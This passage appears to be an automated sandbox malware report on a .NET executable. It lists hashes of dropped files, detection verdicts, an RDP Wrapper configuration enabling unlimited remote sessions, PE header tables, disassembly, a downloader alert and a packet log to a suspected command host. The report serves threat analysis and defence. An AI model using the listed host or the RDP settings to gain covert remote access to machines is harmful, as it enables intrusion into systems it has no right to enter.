                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                                      File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):443552
                                                                                                                                                      Entropy (8bit):5.4496544667416975
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                                                                                                      MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                                                                                                      SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                                                                                                      SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                                                                                                      SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                                                      Process:C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1298
                                                                                                                                                      Entropy (8bit):5.345181606725495
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeBE4D2c/sXE4qdKm:MxHKlYHKh3oPtHo6hAHKzeBHCHHA
                                                                                                                                                      MD5:B602069B69E310409FAD82BFC3CBB818
                                                                                                                                                      SHA1:ED23568805903474D8E77BCE3AD927E5065FFFCD
                                                                                                                                                      SHA-256:979D1AD6AF4CFA4BF6782D5F781BE35F0C7B9FF42B09EE9D3165A3E8F3B80E57
                                                                                                                                                      SHA-512:A5EFDA1DAA3616317054E5F692DF3A7ACA497DFA7BD3B42F056777F0CA3BAF422725C88C47FDC8718CA157CABB15BCCDC26EDAF8A31ECA491FC1C38A8342C43C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Di
                                                                                                                                                      Process:C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):1785344
                                                                                                                                                      Entropy (8bit):6.646511331349125
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                                                                                                                      MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                                                                      SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                                                                                                                      SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                                                                                                                      SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):37376
                                                                                                                                                      Entropy (8bit):5.7181012847214445
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                                      MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                                      SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                                      SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                                      SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):7
                                                                                                                                                      Entropy (8bit):2.2359263506290326
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:t:t
                                                                                                                                                      MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                                      SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                                      SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                                      SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:Ok.....
                                                                                                                                                      Process:C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):64
                                                                                                                                                      Entropy (8bit):3.650608324205336
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:KMvVI2Y1AnXEllt/8lLn:KMyGAltMLn
                                                                                                                                                      MD5:C2C98412E61544A45B0F0684A0459DF7
                                                                                                                                                      SHA1:66CFAF83EB9D71BFEDCCE903CCE8CCE99CD03BB0
                                                                                                                                                      SHA-256:7C82861BC89F90A1A1FAC85D2048045E093D92703839B13CEDCFF2BADA75FF90
                                                                                                                                                      SHA-512:0EEC83D9C2A6C3F08F4CA6FE050133A5A9C83B98C7F60A9790F04633BDF1159E4D354889301C99F45DB2BEBA3D3C15CF956EC9099F7DF90D4C2361977E714BE7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:....8.9.9.5.5.2.....\MAILSLOT\NET\GETDC669D7A1B.................
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):7.9948529199912715
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                      File name:67065b4c84713_Javiles.exe
                                                                                                                                                      File size:940'032 bytes
                                                                                                                                                      MD5:8be8e5e57fc2a177c12ac52d6f71157c
                                                                                                                                                      SHA1:6d53911869b932db7dcbc5e9fb0c023fe3d520ad
                                                                                                                                                      SHA256:f1417213f43cad96ecab7f83251b963706b22e4ebe4e6b34080fc6227ee359b3
                                                                                                                                                      SHA512:c0d2222c6f0d41af95a2c4ee81900ff694c9c88c0c4f92bd23cbbe404446676d1bfa1601b4f3626fca027128a0882796a502b9f246dba5729ae63981a5a93dcb
                                                                                                                                                      SSDEEP:12288:GR6r7VWX5FQrB7bTui/rZBEEjHJX/23Y3DTLPbW784Gpxk83jwtScr/C80Vd424:p5WX0rB7uivDX/CYzQ84GpxkFScTC81
                                                                                                                                                      TLSH:1215235F23CC9912FF89ECF327A6490418B477D2B2369761A7281D3CA1D9BC18832B59
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z..........."...0..N...........m... ........@.. ....................................`................................
                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                      Entrypoint:0x4e6dce
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0xEF5ACDDE [Tue Apr 2 01:46:06 2097 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe6d7c0x4f.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe80000x4e4.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xe6cf00x38.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x20000xe4dd40xe4e0086d38c5519354257967b1a2468784f65False0.991511213134899data7.996881182641007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0xe80000x4e40x600d7b72d8d9a07a12abba1526dff3742a4False0.3782552083333333data3.748034852880635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0xea0000xc0x200674dad96b45dd940f71cb06efaa0a1f5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_VERSION0xe80900x254data0.45805369127516776
                                                                                                                                                      RT_MANIFEST0xe82f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                      DLLImport
                                                                                                                                                      mscoree.dll_CorExeMain
                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2024-10-11T23:07:44.257533+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738172.67.74.15280TCP
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Oct 11, 2024 23:07:01.024482012 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.029557943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.029655933 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.032289982 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.037302971 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722157955 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722183943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722198009 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722212076 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722227097 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722242117 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722255945 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722270966 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722275972 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.722287893 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722302914 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.722352028 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.722352028 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.722352028 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.727219105 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.727272987 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.727286100 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.727327108 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.773075104 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.813031912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813116074 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813153028 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813174009 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.813185930 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813220024 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813225985 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.813251972 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813283920 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813287020 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.813319921 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813354015 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.813699961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813733101 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813767910 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813770056 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.813805103 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813839912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.813839912 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.814593077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.814609051 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.814623117 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.814629078 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.814655066 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.814762115 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.814778090 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.814814091 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.815305948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.815491915 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.815506935 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.815520048 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.815530062 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.815556049 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.903064013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903098106 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903155088 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903162956 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903177977 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903184891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903198957 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903265953 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903304100 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903318882 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903382063 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.903382063 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.903422117 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903458118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903501987 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.903876066 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903928995 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903969049 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.903994083 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.904020071 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904052973 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904061079 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.904084921 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904119015 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904129028 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.904766083 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904800892 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904824972 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904827118 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.904840946 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904867887 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.904901028 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904915094 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904932022 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.904943943 CEST4973080192.168.2.4147.45.44.104
